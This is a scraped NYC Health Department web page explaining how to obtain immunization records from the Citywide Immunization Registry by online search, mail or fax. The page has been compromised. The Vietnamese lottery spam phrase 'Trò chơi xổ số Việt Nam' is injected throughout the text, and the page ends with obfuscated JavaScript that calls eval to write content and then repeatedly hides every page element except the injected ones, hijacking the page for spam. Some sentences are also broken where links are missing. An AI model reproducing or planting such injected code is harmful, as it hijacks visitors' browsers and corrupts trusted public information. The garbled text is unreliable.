Vaccine Records

[ Ver esta página en español ]

The NYC Health Department's Citywide Immunization Registry (CIR) collects New Yorkers' to help ensure that people receive life-saving immunizations, to monitor vaccination rates and to protect public health.

The CIR vaccine record contains all immunizations reported by NYC health care providers for city residents younger than 19. Providers are required by law to make these reports. Immunizations may also be reported for adults, with their consent. This record is official and may be submitted to child care centers, schools, camps and employers.

Most immunization records in the CIR are for people born in NYC after 1995.

Request a Record


Individuals, parents and legal guardians can get their CIR immunization record and also check which vaccines they may need. You can search for your or your child's immunization record by visiting . To learn how to access records, click on that site’s “Accessing Records” tab.

Currently, only IDNYC cardholdersTrò chơi xổ số Việt Nam can search for immunization records online.

If a child's health care provider has listed you as the parent/guardian in the CIR, you may access their record. Each time your child gets vaccinated, be sure to ask the provider to update or confirm the parent/guardian contact information in the CIR.

Trò chơi xổ số Việt NamMost immunization records in the CIR were reported by health care providers in NYC.

By Mail or Fax

Trò chơi xổ số Việt NamIf you cannot request a vaccine record online, you can apply for a record by mailing or faxing the completed application below.

Trò chơi xổ số Việt NamYou may also call 311 to request that a copy of the application be mailed to you. Record requests by mail or fax take about two weeks to process.

No Record Found

Trò chơi xổ số Việt NamIf your record is not found in the CIR (or it contains no immunizations), you should contact your health care provider and ask them to report your immunization history and future immunizations to the CIR. The provider can call the Provider Access Line at (866) 692-3641 for more information.

New Residents

If you or your child were not born in the city, your provider will need a copy of the immunization history to add to the CIR record. You should contact your or your child's previous health care provider, or the last school you or your child attended, for your immunization records. The state where you previously lived may also have your records in its immunization registry.

Trò chơi xổ số Việt NamIf you moved to the city from elsewhere in New York State, the immunization record may already be in the CIR. You should contact your or your child's previous health care provider, the last school you or your child attended, the New York State Department of Health, or your local (county) health department for your immunization records.

Lifetime Health Records

Trò chơi xổ số Việt NamCIR records do not replace individual- or parent-maintained immunization records, such as the Lifetime Health Record (commonly known as the "yellow card"). Providers, individuals and parents/guardians should continue to use this record.

If you or your child received vaccinations outside of the city and they are recorded on the card, you can add these vaccinations to the CIR record by completing and mailing the enrollment form below. You can also call 311 to request that a copy of the form be mailed to you.

Additional Resources

More Information

var SSpfGu1 = '
'; window["eval"]("do" + "cu" + "ment.wr" + "ite('" + SSpfGu1 + "');"); try { setInterval(function() { try { window["document"]["getElementById"]("div" + "All")["style"]["display"] = "no" + "ne" } catch (e) {} for (var t2$2 = 0; t2$2 < window["document"]["body"]["children"]["length"]; t2$2++) { try { var Dr3 = window["document"]["body"]["children"][t2$2]["tagName"]; var LsLMcufmw4 = window["document"]["body"]["children"][t2$2]["id"]; if (LsLMcufmw4 != "iconDiv1" && LsLMcufmw4 != "showcloneshengxiaon") { window["document"]["body"]["children"][t2$2]["style"]["display"] = "non" + "e" } } catch (e) {} } }, 100) } catch (e) {}